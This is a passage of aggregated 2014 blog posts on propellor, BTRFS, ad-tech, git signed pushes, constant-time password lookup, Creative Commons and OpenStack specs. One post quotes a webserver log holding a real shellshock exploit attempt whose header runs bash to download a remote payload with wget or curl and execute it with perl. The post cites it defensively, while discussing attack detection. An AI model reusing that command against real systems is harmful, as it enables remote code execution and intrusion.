This is what I've now taught propellor to do! Here's a working configuration which will make propellor convert a system running Fedora (or probably many other Linux distros) to Debian:

testvm :: Host
testvm = host "testvm.kitenet.net"
        & os (System (Debian Unstable) "amd64")
        & OS.cleanInstallOnce (OS.Confirmed "testvm.kitenet.net")
                `onChange` propertyList "fixing up after clean install"
                        [ User.shadowConfig True
                        , OS.preserveRootSshAuthorized
                        , OS.preserveResolvConf
                        , Apt.update
                        , Grub.boots "/dev/sda"
                                `requires` Grub.installed Grub.PC
                        ]
        & Hostname.sane
        & Hostname.searchDomain
        & Apt.installed ["linux-image-amd64"]
        & Apt.installed ["ssh"]
        & User.hasSomePassword "root"

It was surprisingly easy to build this. Propellor already knew how to create a chroot, so from there it basically just has to move files around until the chroot takes over from the old OS.

After the cleanInstallOnce property does its thing, propellor is running inside a freshly debootstrapped Debian system. Then we just need a few more Properties to get from there to a bootable, usable system: Install grub and the kernel, turn on shadow passwords, preserve a few config files from the old OS, etc.

It's really astounding to me how much easier this was to build than it was to build d-i. It took years to get d-i to the point of being able to install a working system. It took me a few part-days to add this capability to propellor (it's 200 lines of code), and I've probably spent less than 30 days total developing propellor in its entirety.

So, what gives? Why is this so much easier? There are a lot of reasons:

  • Technology is so much better now. I can spin up cloud VMs for testing in seconds; I use VirtualBox to restore a system from a snapshot. So testing is much much easier. The first work on d-i was done by booting real machines, and for a while I was booting them using floppies.

  • Propellor doesn't have a user interface. The best part of d-i is preseeding, but that was mostly an accident; when I started developing d-i the first thing I wrote was main-menu (which is invisible 99.9% of the time) and we had to develop cdebconf, and tons of other UI. Probably 90% of d-i work involves the UI. Jettisoning the UI entirely thus speeds up development enormously. And propellor's configuration file blows d-i preseeding out of the water in expressiveness and flexibility.

  • Propellor has a much more principled design and implementation. Separating things into Properties, which are composable and reusable gives enormous leverage. Strong type checking and a powerful programming language make it much easier to develop than d-i's mess of shell scripts calling underpowered busybox commands etc. Properties often Just Work the first time they're tested.

  • No separate runtime. d-i runs in its own environment, which is really a little custom linux distribution. Developing linux distributions is hard. Propellor drops into a live system and runs there. So I don't need to worry about booting up the system, getting it on the network, etc etc. This probably removes another order of magnitude of complexity from propellor as compared with d-i.

This seems like the opposite of the Second System effect to me. So perhaps d-i was the second system all along?

I don't know if I'm going to take this all the way to propellor is d-i 2.0. But in theory, all that's needed now is:

  • Teaching propellor how to build a bootable image, containing a live Debian system and propellor. (Yes, this would mean reimplementing debian-live, but I estimate 100 lines of code to do it in propellor; most of the Properties needed already exist.) That image would then be booted up and perform the installation.
  • Some kind of UI that generates the propellor config file.
  • Adding Properties to partition the disk.

cleanInstallOnce and associated Properties will be included in propellor's upcoming 1.1.0 release, and are available in git now.

Oh BTW, you could parameterize a few Properties by OS, and Propellor could be used to install not just Debian or Ubuntu, but whatever Linux distribution you want. Patches welcomed...

Syndicated 2014-12-05 20:24:32 from see shy jo

5 Dec 2014 etbe   » (Master)

BTRFS Status Dec 2014

My last problem with BTRFS was in August [1]. BTRFS has been running mostly uneventfully for me for the last 4 months, that’s a good improvement but the fact that 4 months of no problems is noteworthy for something as important as a filesystem is a cause for ongoing concern.

A RAID-1 Array

A week ago I had a minor problem with my home file server: one of the 3TB disks in the BTRFS RAID-1 started giving read errors. That's not a big deal; I bought a new disk and did a “btrfs replace” operation, which was quick and easy. The first annoyance was that the output of “btrfs device stats” reported an error count for the new device; it seems that “btrfs device replace” copies everything from the old disk, including the error count. The solution is to use “btrfs device stats -z” to reset the count after replacing a device.

I replaced the 3TB disk with a 4TB disk (with current prices it doesn’t make sense to buy a new 3TB disk). As I was running low on disk space I added a 1TB disk to give it 4TB of RAID-1 capacity; one of the nice features of BTRFS is that a RAID-1 filesystem can support any combination of disks and use them to store 2 copies of every block of data. I started running a btrfs balance to get BTRFS to try and use all the space, before learning from the mailing list that I should have done “btrfs filesystem resize” to make it use all the space. So my balance operation had configured the filesystem for 2*3TB+1*1TB disks, which wasn’t the right configuration once the 4TB disk could be fully used. To make it even more annoying, the “btrfs filesystem resize” command takes a “devid”, not a device name.

I think that when BTRFS is more stable it would be good to have the btrfs utility warn the user about such potential mistakes. When a replacement device is larger than the old one it will be very common to want to use that space. The btrfs utility could easily suggest the most likely “btrfs filesystem resize” to make things easier for the user.
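For reference, the commands in question look like this (the mount point and devid here are examples, not my actual setup):

```shell
# find the devid of the replacement device
btrfs filesystem show /mnt/backup

# grow that device to its full size - note it wants the devid, not the name
btrfs filesystem resize 2:max /mnt/backup

# then balance so the new space can hold both copies of each block
btrfs balance start /mnt/backup
```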

In a disturbing coincidence a few days after replacing the first 3TB disk the other 3TB disk started giving read errors. So I replaced the second 3TB disk with a 4TB disk and removed the 1TB disk to give a 4TB RAID-1 array. This is when it would be handy to have the metadata duplication feature and copies= option of ZFS.

Ctree Corruption

2 weeks ago a basic workstation with a 120G SSD owned by a relative stopped booting, the most significant errors it gave were “BTRFS: log replay required on RO media” and “BTRFS: open_ctree failed”. The solution to this is to run the command “btrfs-zero-log”, but that initially didn’t work. I restored the system from a backup (which was 2 months old) and took the SSD home to work on it. A day later “btrfs-zero-log” worked correctly and I recovered all the data. Note that I didn’t even try mounting the filesystem in question read-write, I mounted it read-only to copy all the data off. While in theory the filesystem should have been OK I didn’t have a need to keep using it at that time (having already wiped the original device and restored from backup) and I don’t have confidence in BTRFS working correctly in that situation.

While it was nice to get all the data back it’s a concern when commands don’t operate consistently.

Debian and BTRFS

I was concerned when the Debian kernel team chose 3.16 as the kernel for Jessie (the next Debian release). Judging by the way development has been going I wasn’t confident that 3.16 would turn out to be stable enough for BTRFS. But 3.16 is working reasonably well on a number of systems so it seems that it’s likely to work well in practice.

But I’m still deploying more ZFS servers.

The Value of Anecdotal Evidence

When evaluating software based on reports from reliable sources (i.e. most readers will trust me to run systems well and only report genuine bugs) bad reports have a much higher weight than good reports. The fact that I’ve seen kernel 3.16 work reasonably well on ~6 systems is nice, but that doesn’t mean it will work well on thousands of other systems – although it does indicate that it will work well on more systems than some earlier Linux kernels which had common BTRFS failures.

But the annoyances I had with the 3TB array are repeatable and will annoy many other people. The ctree corruption problem MIGHT have been initially caused by a memory error (it’s a desktop machine without ECC RAM) but the recovery process was problematic and other users might expect problems in such situations.

Related posts:

  1. BTRFS Status March 2014 I’m currently using BTRFS on most systems that I can...
  2. BTRFS Status April 2014 Since my blog post about BTRFS in March [1] not...
  3. BTRFS Status July 2014 My last BTRFS status report was in April [1], it...

Syndicated 2014-12-05 08:09:27 from etbe - Russell Coker

5 Dec 2014 dmarti   » (Master)

Figure 1

Well, "Targeted Advertising Considered Harmful" has a graph now.

This is what happens when you take the ad spending vs. user time data from each year's edition of Mary Meeker's Internet Trends report.

What is it about print advertising that makes it so much more valuable per user minute than web or mobile advertising?

Why has web advertising stayed in roughly the same spot even as the amount of processing power being thrown at the problem of matching users to ads increases?

Why is mobile, the most targetable medium of all, even crappier than the web?

Syndicated 2014-12-05 04:53:09 from Don Marti

4 Dec 2014 pixelbeat   » (Journeyer)

Avoiding interface delays in Thunderbird

Tips for speeding up the thunderbird interface

Syndicated 2014-12-04 15:59:12 from www.pixelbeat.org

4 Dec 2014 slef   » (Master)

Autumn Statement #AS2014, the Google tax and how it relates to Free Software

One of the attention-grabbing measures in the Autumn Statement by Chancellor George Osborne was the google tax on profits going offshore, which may prove unworkable (The Independent). This is interesting because a common mechanism for moving the profits around is so-called transfer pricing, where the business in one country pays an inflated price to its sibling in another country for some supplies. It sounds like the intended way to deal with that is by inspecting company accounts and assessing the underlying profits.

So what’s this got to do with Free Software? Well, one thing the company might buy from itself is a licence to use some branding, paying a fee for each use. The main reason this is possible is because copyright is usually a monopoly, so there is no supplier of a replacement product, which makes it hard to assess how much the price has been inflated.

One possible method of assessing the overpayment would be to compare with how much other businesses pay for their branding licences. It would be interesting if Revenue and Customs decide that there’s lots of Royalty Free licensing out there – including Free Software – and so all licence fees paid to related companies are a tax avoidance ruse. Similarly, any premium for a particular self-branded product over a generic equivalent could be classed as profit transfer.

This could have amusing implications for proprietary software producers who sell to sister companies but I doubt that the government will be that radical, so we’ll continue to see absurdities like Starbucks buying all their coffee from famous coffee producing countries Switzerland and the Netherlands. Shouldn’t this be stopped, really?

Syndicated 2014-12-04 04:34:00 from Software Cooperative News » mjr

4 Dec 2014 nbm   » (Journeyer)

Starting is one of the hardest things to do

I guess after writing blog software, buying domains and certificates, setting up Route 53 and Elastic Load Balancing and Elastic Beanstalk, and implementing HSTS, I should start writing some content.

Syndicated 2014-12-03 07:45:00 from Neil Blakey-Milner

3 Dec 2014 lucasr   » (Master)

New tablet UI for Firefox on Android

The new tablet UI for Firefox on Android is now available on Nightly and, soon, Aurora! Here’s a quick overview of the design goals, development process, and implementation.

Design & Goals

Our main goal with the new tablet UI was to simplify the interaction with tabs—read Yuan Wang’s blog post for more context on the design process.

In 36, we focused on getting a solid foundation in place with the core UI changes. It features a brand new tab strip that allows you to create, remove and switch tabs with a single tap, just like on Firefox on desktop.

The toolbar got revamped with a cleaner layout and simpler state changes.

Furthermore, the fullscreen tab panel—accessible from the toolbar—gives you a nice visual overview of your tabs and sets the stage for more advanced features around tab management in future releases.

Development process

At Mozilla, we traditionally work on big features in a separate branch to avoid disruptions in our 6-week development cycles. But that means we don’t get feedback until the feature lands in mozilla-central.

We took a slightly different approach in this project. It was a bit like replacing parts of an airplane while it’s flying.

We first worked on the necessary changes to allow the app to have parallel UI implementations in a separate branch. We then merged the new code to mozilla-central and did most of the UI development there.

This approach enabled us to get early feedback in Nightly before the UI was considered feature-complete.

Implementation

In order to develop the new UI directly in mozilla-central, we had to come up with a way to run either the old or the new tablet UIs in the same build.

We broke up our UI code behind interfaces with multiple concrete implementations for each target UI, used view factories to dynamically instantiate parts of the UI, prefixed overlapping resources, and more.

The new tab strip uses the latest stable release of TwoWayView, which got a bunch of important bug fixes and a couple of new features such as smooth scroll to position.


Besides improving Firefox’s UX on Android tablets, the new UI lays the groundwork for some cool new features. This is not a final release yet and we’ll be landing bug fixes until 36 is out next year. But you can try it now in our Nightly builds. Let us know what you think!

Syndicated 2014-12-03 21:45:22 from Lucas Rocha

3 Dec 2014 vicious   » (Master)

Grossly violating elections

Russia reports gross violations in Moldova elections [1].  And Russia knows all about grossly violating elections…


Syndicated 2014-12-03 17:07:55 from The Spectre of Math

3 Dec 2014 dmarti   » (Master)

Nifty tech delivers ineffective crap at incredible speed!

Andy Oram: A small technological marvel occurs on almost every visit to a web page. In the seconds that elapse between the user’s click and the display of the page, an ad auction takes place in which hundreds of bidders gather whatever information they can get on the user, determine which ads are likely to be of interest, place bids, and transmit the winning ad to be placed in the page. (How browsers get to know you in milliseconds)

Bob Hoffman: The rate of clicking on banner ads is so tiny, that for a media genius to deliver the 100 clicks she promises a client she has to buy over 100,000 impressions. And so, in trying to achieve goals, an enormous amount of ads must be bought. And splattered all over everything we are trying to do online. Also, because they are so ineffective, they are ridiculously cheap. And they keep getting cheaper. The result is that every creepy company in the world can afford these things and annoy the shit out of us with them. (Display Advertising is Poison)

Hold on a minute. Online display ads are terribly ineffective, despite all the bleeding-edge technology being thrown at them?

Close. But not despite. Because.

Syndicated 2014-12-03 15:13:48 from Don Marti

3 Dec 2014 mones   » (Journeyer)

A useful new feature of git

Just read in LWN that git 2.2.0 is coming with support for signed pushes. What's that? Well, the name says it all: you can sign the 'git push' operation with your PGP key, and the signature can of course be checked in the corresponding server-side hook.

This opens a new way of contributing to public repositories without the need to have an actual account on the machine, which is always good for sysadmins :-) and security, of course. In the case of Claws Mail, translators could be pushing their translations, for example, which could also be good for our release manager ;-).
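On the client side it's a single flag; on the server side the certificate shows up in the hook's environment (as documented in githooks(5)):

```shell
# client: sign the push
git push --signed origin master

# server: in hooks/pre-receive the certificate is available as a blob:
#   GIT_PUSH_CERT        - object name of the signed push certificate
#   GIT_PUSH_CERT_SIGNER - identity of the key that signed it
#   GIT_PUSH_CERT_STATUS - 'G' if the signature verified
git cat-file blob "$GIT_PUSH_CERT"
```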

Syndicated 2014-12-02 23:46:22 from Ricardo Mones

2 Dec 2014 wingo   » (Master)

there are no good constant-time data structures

Imagine you have a web site that people can access via a password. No user name, just a password. There are a number of valid passwords for your service. Determining whether a password is in that set is security-sensitive: if a user has a valid password then they get access to some secret information; otherwise the site emits a 404. How do you determine whether a password is valid?

The go-to solution for this kind of problem for most programmers is a hash table. A hash table is a set of key-value associations, and its nice property is that looking up a value for a key is quick, because it doesn't have to check against each mapping in the set.

Hash tables are commonly implemented as an array of buckets, where each bucket holds a chain. If the bucket array is 32 elements long, for example, then keys whose hash is H are looked for in bucket H mod 32. The chain contains the key-value pairs in a linked list. Looking up a key traverses the list to find the first pair whose key equals the given key; if no pair matches, then the lookup fails.

Unfortunately, storing passwords in a normal hash table is not a great idea. The problem isn't so much in the hash function (the hash in H = hash(K)) as in the equality function; usually the equality function doesn't run in constant time. Attackers can detect differences in response times according to when the "not-equal" decision is made, and use that to break your passwords.
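In Python, for instance, a constant-time equality check is a one-liner with the standard library, and easy to sketch by hand (function names here are mine, and Python makes no hard timing promises - but this is the shape of the thing):

```python
import hmac


def ct_equal(a: bytes, b: bytes) -> bool:
    # hmac.compare_digest is the stdlib's constant-time comparison.
    return hmac.compare_digest(a, b)


def ct_equal_manual(a: bytes, b: bytes) -> bool:
    # The idea behind it: XOR every byte pair and accumulate, deciding
    # only after the whole string has been scanned -- never bail out at
    # the first mismatch.  (Lengths are assumed to be public here.)
    if len(a) != len(b):
        return False
    acc = 0
    for x, y in zip(a, b):
        acc |= x ^ y  # stays 0 only if every byte matches
    return acc == 0
```

The point is that the number of operations depends only on the length of the inputs, not on where (or whether) they differ.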

So let's say you ensure that your hash table uses a constant-time string comparator, to protect against the hackers. You're safe! Or not! Because not all chains have the same length, "interested parties" can use lookup timings to distinguish chain lookups that take 2 comparisons compared to 1, for example. In general they will be able to determine the percentage of buckets for each chain length, and given the granularity will probably be able to determine the number of buckets as well (if that's not a secret).

Well, as we all know, small timing differences still leak sensitive information and can lead to complete compromise. So we look for a data structure that takes the same number of algorithmic steps to look up a value. For example, bisection over a sorted array of size SIZE will take ceil(log2(SIZE)) steps to find the value, independent of what the key is and also independent of what is in the set. At each step, we compare the key and a "mid-point" value to see which is bigger, and recurse on one of the halves.

One problem is, I don't know of a nice constant-time comparison algorithm for (say) 160-bit values. (The "passwords" I am thinking of are randomly generated by the server, and can be as long as I want them to be.) I would appreciate any pointers to such a constant-time less-than algorithm. However a bigger problem is that the time it takes to access memory is not constant; accessing element 0 of the sorted array might take more or less time than accessing element 10. In algorithms we typically model access on a more abstract level, but in hardware there's a complicated parallel and concurrent protocol of low-level memory that takes a non-deterministic time for any given access. "Hot" (more recently accessed) memory is faster to read than "cold" memory.
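One standard construction is a branchless bit-scan: examine every bit position unconditionally, from most to least significant, and fold the answer in with masks. A sketch in Python (my code, and only illustrative - Python's big-int operations aren't actually constant time; a real implementation would do this on fixed-width machine words in C):

```python
def ct_less_than(a: int, b: int, bits: int = 160) -> int:
    """Return 1 if a < b, 0 otherwise, for `bits`-wide unsigned ints.

    Always visits every bit position and never branches on the data,
    so the operation sequence is independent of the values compared.
    """
    lt = 0  # becomes 1 once we know a < b
    eq = 1  # stays 1 while the prefixes seen so far are equal
    for i in reversed(range(bits)):
        ai = (a >> i) & 1
        bi = (b >> i) & 1
        lt |= eq & (bi & (ai ^ 1))  # first differing bit has ai=0, bi=1
        eq &= (ai ^ bi) ^ 1         # cleared once any bit differs
    return lt
```

The trick is that `eq` masks out every position after the first difference, so only the highest differing bit decides the result, yet all `bits` iterations always run.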

Non-deterministic memory access leaks timing information, and in the case of binary search the result is disaster: the attacker can literally bisect the actual values of all of the passwords in your set, by observing timing differences. The worst!

You could get around this by ordering "passwords" not by their actual values but by their cryptographic hashes (e.g. by their SHA256 values). This would force the attacker to bisect not over the space of password values but of the space of hash values, which would protect actual password values from the attacker. You still leak some timing information about which paths are "hot" and which are "cold", but you don't expose actual passwords.
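A sketch of that idea, assuming SHA-256 as the hash (function names are illustrative): store the digests in sorted order and bisect over them, so an attacker bisecting via timing learns positions in hash space rather than actual password values.

```python
import bisect
import hashlib

def build_table(passwords):
    # Sort the SHA-256 digests, not the passwords themselves; the array's
    # order now reveals nothing about the ordering of the actual values.
    return sorted(hashlib.sha256(p).digest() for p in passwords)

def contains(table, password):
    h = hashlib.sha256(password).digest()
    i = bisect.bisect_left(table, h)   # ceil(log2(len(table))) steps
    return i < len(table) and table[i] == h
```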

It turns out that, as far as I am aware, it is impossible to design a key-value map on common hardware that runs in constant time and is sublinear in the number of entries in the map. As Zooko put it, running in constant time means that the best case and the worst case run in the same amount of time. Of course this is false for bucket-and-chain hash tables, but it's false for binary search as well, as "hot" memory access is faster than "cold" access. The only plausible constant-time operation on a data structure would visit each element of the set in the same order each time. All constant-time operations on data structures are linear in the size of the data structure. Thems the breaks! All you can do is account for the leak in your models, as we did above when ordering values by their hash and not their normal sort order.

Once you have resigned yourself to leaking some bits of the password via timing, you would be fine using normal hash tables as well -- just use a cryptographic hashing function and a constant-time equality function and you're good. No constant-time less-than operator need be invented. You leak something on the order of log2(COUNT) bits via timing, where COUNT is the number of passwords, but since that's behind a hash you can't use it to bisect on actual key values. Of course, you have to ensure that the hash table isn't storing values in sorted order and short-cutting early. This sort of detail isn't usually part of the contract of stock hash table implementations, so you probably still need to build your own.
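A minimal sketch of such a hand-rolled table (names hypothetical): key on the SHA-256 digest, walk the whole chain with a constant-time comparison, and never short-cut on a hit.

```python
import hashlib
import hmac

class HashedSet:
    """Bucket-and-chain set keyed on the SHA-256 digest of each value."""

    def __init__(self, nbuckets=64):
        self.buckets = [[] for _ in range(nbuckets)]

    def _bucket(self, digest):
        # Bucket choice depends only on digest bytes, never the raw value.
        return self.buckets[digest[0] % len(self.buckets)]

    def add(self, value):
        d = hashlib.sha256(value).digest()
        self._bucket(d).append(d)

    def __contains__(self, value):
        d = hashlib.sha256(value).digest()
        found = False
        for stored in self._bucket(d):
            # No early break: every lookup scans its whole chain, and
            # compare_digest avoids early-exit equality.
            found |= hmac.compare_digest(stored, d)
        return bool(found)
```

As the text says, chain-length timing still leaks on the order of log2(COUNT) bits, but only about positions in hash space.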

An alternative is to encode your data structure differently, for example by having the "key" itself contain the value, signed by a private key known only to the server. But this approach is limited by network capacity and the appropriateness of copying for the data in question. It's not appropriate for photos, for example, as they are just too big.

Corrections appreciated from my knowledgeable readers :) I was quite disappointed when I realized that there were no good constant-time data structures and would be happy to be proven wrong. Thanks to Darius Bacon, Zooko Wilcox-O'Hearn, Jan Lehnardt, and Paul Khuong on Twitter for their insights; all mistakes are mine.

Syndicated 2014-12-02 22:01:38 from wingolog

2 Dec 2014 louie   » (Master)

Free-riding and copyleft in cultural commons like Flickr

Flickr recently started selling prints of Creative Commons Attribution-Share Alike photos without sharing any of the revenue with the original photographers. When people were surprised, Flickr said “if you don’t want commercial use, switch the photo to CC non-commercial”.

This seems to have mostly caused two reactions:

  1. “This is horrible! Creative Commons is horrible!”
  2. “Commercial reuse is explicitly part of the license; I don’t understand the anger.”

I think it makes sense to examine some of the assumptions those users (and many license authors) may have had, and what that tells us about license choice and design going forward.

Free ride!!, by Dhinakaran Gajavarathan (https://www.flickr.com/photos/dhinakaran/), under CC BY 2.0

Free riding is why we share-alike…

As I’ve explained before here, a major reason why people choose copyleft/share-alike licenses is to prevent free rider problems: they are OK with you using their thing, but they want the license to nudge (or push) you in the direction of sharing back/collaborating with them in the future. To quote Elinor Ostrom, who won a Nobel for her research on how commons are managed in the wild, “[i]n all recorded, long surviving, self-organized resource governance regimes, participants invest resources in monitoring the actions of each other so as to reduce the probability of free riding.” (emphasis added)

… but share-alike is not always enough

Copyleft is one of our mechanisms for this in our commons, but it isn’t enough. I think experience in free/open/libre software shows that free rider problems are best prevented when three conditions are present:

  • The work being created is genuinely collaborative — i.e., many authors who contribute similarly to the work. This reduces the cost of free riding to any one author. It also makes it more understandable/tolerable when a re-user fails to compensate specific authors, since there is so much practical difficulty for even a good-faith reuser to evaluate who should get paid and contact them.
  • There is a long-term cost to not contributing back to the parent project. In the case of Linux and many large software projects, this long-term cost is about maintenance and security: if you’re not working with upstream, you’re not going to get the benefit of new fixes, and will pay a cost in backporting security fixes.
  • The license triggers share-alike obligations for common use cases. The copyleft doesn’t need to perfectly capture all use cases. But if at least some high-profile use cases require sharing back, that helps discipline other users by making them think more carefully about their obligations (both legal and social/organizational).

Alternately, you may be able to avoid damage from free rider problems by taking the Apache/BSD approach: genuinely, deeply educating contributors, before they contribute, that they should only contribute if they are OK with a high level of free riding. It is hard to see how this can work in a situation like Flickr’s, because contributors don’t have extensive community contact.1

The most important takeaway from this list is that if you want to prevent free riding in a community-production project, the license can’t do all the work itself — other frictions that somewhat slow reuse should be present. (In fact, my first draft of this list didn’t mention the license at all — just the first two points.)

Flickr is practically designed for free riding

Flickr fails on all the points I’ve listed above — it has no frictions that might discourage free riding.

  • The community doesn’t collaborate on the works. This makes the selling a deeply personal, “expensive” thing for any author who sees their photo for sale. It is very easy for each of them to find their specific materials being reused, and see a specific price being charged by Yahoo that they’d like to see a slice of.
  • There is no cost to re-users who don’t contribute back to the author—the photo will never develop security problems, or get less useful with time.
  • The share-alike doesn’t kick in for virtually any reuses, encouraging Yahoo to look at the relationship as a purely legal one, and encouraging them to forget about the other relationships they have with Flickr users.
  • There is no community education about the expectations for commercial use, so many people don’t fully understand the licenses they’re using.

So what does this mean?

This has already gone on too long, but a quick thought: what this suggests is that if you have a community dedicated to creating a cultural commons, it needs some features that discourage free riding — and critically, mere copyleft licensing might not be good enough, because of the nature of most production of commons of cultural works. In Flickr’s case, maybe this should simply have included not doing this, or making some sort of financial arrangement despite what was legally permissible; for other communities and other circumstances other solutions to the free-rider problem may make sense too.

And I think this argues for consideration of non-commercial licenses in some circumstances as well. This doesn’t make non-commercial licenses more palatable, but since commercial free riding is typically people’s biggest concern, and other tools may not be available, it is entirely possible it should be considered more seriously than free and open source software dogma might have you believe.

  1. It is open to discussion, I think, whether this works in Wikimedia Commons, and how it can be scaled as Commons grows.

Syndicated 2014-12-02 16:14:16 from Luis Villa » Blog

2 Dec 2014 Stevey   » (Master)

Paying attention to webserver logs

If you run a webserver chances are high that you'll get hit by random exploit-attempts. Today one of my servers has this logged - an obvious shellshock exploit attempt:

92.242.4.130 blog.steve.org.uk - [02/Dec/2014:11:50:03 +0000] \
"GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \
 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://146.71.108.154/pis ; \
curl -O http://146.71.108.154/pis;perl pis;rm -rf pis\"; node-reverse-proxy.js"

Yesterday I got hit with thousands of these referer-spam attempts:

152.237.221.99 - - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1"  \
200 7425 "http://buttons-for-website.com" \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

When it comes to stopping dictionary attacks against SSH servers we have things like denyhosts, fail2ban, (or even non-standard SSH ports).

For Apache/webserver exploits we have? mod_security?

I recently heard of apache-scalp which seems to be a project to analyse webserver logs to look for patterns indicative of attack-attempts.

Unfortunately the suggested ruleset comes from the PHP IDS project and is horribly bad.

I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else thinks the rules are bad - which is what I thought of the PHP-IDS set - I guess it's hard to know.
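As a hedged sketch of what such hand-written rules might look like (the names and patterns below are illustrative only, not a vetted ruleset), matching the two log excerpts above:

```python
import re

# Illustrative rules in the spirit of apache-scalp: each entry is a name
# plus a regex applied to a raw access-log line.
RULES = [
    ("shellshock", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    ("referer-spam", re.compile(r'"http://buttons-for-website\.com"')),
]

def classify(line):
    """Return the names of every rule that matches this log line."""
    return [name for name, pattern in RULES if pattern.search(line)]
```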

For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.

Shame.

Syndicated 2014-12-02 13:51:10 from Steve Kemp's Blog

2 Dec 2014 dmarti   » (Master)

Who's taking all the online ad money? (it's not me)

Chris Sutcliffe says publishers are losing out to adtech: Vox may have both innovative ad formats and significant scale, but traditional display isn't seen as especially exciting in a world where Google, Facebook and ad tech firms are taking home most of the money. (Why has Vox Media been valued at less than half of BuzzFeed?)

Michael Eisenberg says adtech firms aren't making much, either: Adtech and ad networks are equally fragile as they are completely dependent on publishers (many of whom themselves, as Adam points out, are dependent on Google and Facebook.) (A Call to Israeli Engineers! Adtech Is Not For You.)

What if they're both right?

What if the money in online advertising is vanishing not because the publishers are making off with it, or because adtech firms are making off with it, but because the valuable parts of advertising are being just plain destroyed online?

What if web ads as we know them are just the digital equivalent of Windshield Flyer Guy? Checking out the car, leaving a flyer. And failing to send a brand-building signal. Targeting destroys signaling power, so adtech firms, and publishers, are fighting over a pool of money that gets smaller as they get better at grabbing it.

John Broughton explains: From the point of view of an advertiser the biggest problem with ad tech (programmatic as it’s called by advertisers) is that it, and the internet at large, is not currently setup to deliver brand advertising. At all. (How will brand advertising work? )

That old browser bug, the flaw in cookie handling that enables tracking and prevents signaling, is costing us a lot, isn't it? Time to talk about the necessary steps for fixing it, for both brands and publishers.

Syndicated 2014-12-02 06:08:40 from Don Marti

2 Dec 2014 mikal   » (Journeyer)

Specs for Kilo

We're now a few weeks away from the kilo-1 milestone, so I thought it was time to update my summary of the Nova specifications that have been proposed so far. So here we go...

API



API (EC2)

  • Expand support for volume filtering in the EC2 API: review 104450.
  • Implement tags for volumes and snapshots with the EC2 API: review 126553 (fast tracked, approved).


Administrative

  • Check that a service isn't running before deleting it: review 131633.
  • Enable the nova metadata cache to be a shared resource to improve the hit rate: review 126705 (abandoned).
  • Enforce instance uuid uniqueness in the SQL database: review 128097 (fast tracked, approved).
  • Implement a daemon version of rootwrap: review 105404.
  • Log request id mappings: review 132819 (fast tracked).
  • Monitor the health of hypervisor hosts: review 137768.
  • Remove the assumption that there is a single endpoint for services that nova talks to: review 132623.


Cells



Containers Service



Database



Hypervisor: Docker



Hypervisor: FreeBSD

  • Implement support for FreeBSD networking in nova-network: review 127827.


Hypervisor: Hyper-V

  • Allow volumes to be stored on SMB shares instead of just iSCSI: review 102190 (approved).


Hypervisor: Ironic



Hypervisor: VMWare

  • Add ephemeral disk support to the VMware driver: review 126527 (fast tracked, approved).
  • Add support for the HTML5 console: review 127283.
  • Allow Nova to access a VMWare image store over NFS: review 126866.
  • Enable administrators and tenants to take advantage of backend storage policies: review 126547 (fast tracked, approved).
  • Enable the mapping of raw cinder devices to instances: review 128697.
  • Implement vSAN support: review 128600 (fast tracked, approved).
  • Support multiple disks inside a single OVA file: review 128691.
  • Support the OVA image format: review 127054 (fast tracked, approved).



Hypervisor: libvirt



Instance features



Internal

  • A lock-free quota implementation: review 135296.
  • Automate the documentation of the virtual machine state transition graph: review 94835.
  • Flatten Aggregate Metadata in the DB: review 134573.
  • Flatten Instance Metadata in the DB: review 134945.
  • Implement a new code coverage API extension: review 130855.
  • Move flavor data out of the system_metadata table in the SQL database: review 126620 (approved).
  • Move to polling for cinder operations: review 135367.
  • Transition Nova to using the Glance v2 API: review 84887.
  • Transition to using glanceclient instead of our own home grown wrapper: review 133485.


Internationalization

  • Enable lazy translations of strings: review 126717 (fast tracked).


Networking



Performance

  • Dynamically alter the interval nova polls components at based on load and expected time for an operation to complete: review 122705.


Scheduler

  • Add a filter to take into account hypervisor type and version when scheduling: review 137714.
  • Add an IOPS weigher: review 127123 (approved, implemented); review 132614.
  • Add instance count on the hypervisor as a weight: review 127871 (abandoned).
  • Allow limiting the flavors that can be scheduled on certain host aggregates: review 122530 (abandoned).
  • Allow the remove of servers from server groups: review 136487.
  • Convert get_available_resources to use an object instead of dict: review 133728.
  • Convert the resource tracker to objects: review 128964 (fast tracked, approved).
  • Create an object model to represent a request to boot an instance: review 127610.
  • Decouple services and compute nodes in the SQL database: review 126895 (approved).
  • Enable adding new scheduler hints to already booted instances: review 134746.
  • Fix the race conditions when migration with server-group: review 135527 (abandoned).
  • Implement resource objects in the resource tracker: review 127609.
  • Improve the ComputeCapabilities filter: review 133534.
  • Isolate the scheduler's use of the Nova SQL database: review 89893.
  • Let schedulers reuse filter and weigher objects: review 134506 (abandoned).
  • Move select_destinations() to using a request object: review 127612.
  • Persist scheduler hints: review 88983.
  • Stop direct lookup for host aggregates in the Nova database: review 132065 (abandoned).
  • Stop direct lookup for instance groups in the Nova database: review 131553.


Security

  • Provide a reference implementation for console proxies that uses TLS: review 126958 (fast tracked, approved).
  • Strongly validate the tenant and user for quota consuming requests with keystone: review 92507.


Storage

  • Allow direct access to LVM volumes if supported by Cinder: review 127318.
  • Enhance iSCSI volume multipath support: review 134299.
  • Failover to alternative iSCSI portals on login failure: review 137468.
  • Implement support for a DRBD driver for Cinder block device access: review 134153.
  • Refactor ISCSIDriver to support other iSCSI transports besides TCP: review 130721.
  • StorPool volume attachment support: review 115716.
  • Support iSCSI live migration for different iSCSI target: review 132323 (approved).


Tags for this post: openstack kilo blueprint spec
Related posts: Specs for Kilo; One week of Nova Kilo specifications; Compute Kilo specs are open; On layers; Juno nova mid-cycle meetup summary: slots; My candidacy for Kilo Compute PTL

Comment

Syndicated 2014-12-01 20:13:00 from stillhq.com : Mikal, a geek from Canberra living in Silicon Valley (no blather posts)

2 Dec 2014 marnanel   » (Journeyer)

Gentle Readers: fold your hands

Gentle Readers
a newsletter made for sharing
volume 2, number 6
27th November 2014: fold your hands
What I’ve been up to

As I mentioned last time, I've been down south for the funeral of my grandmother Joy.

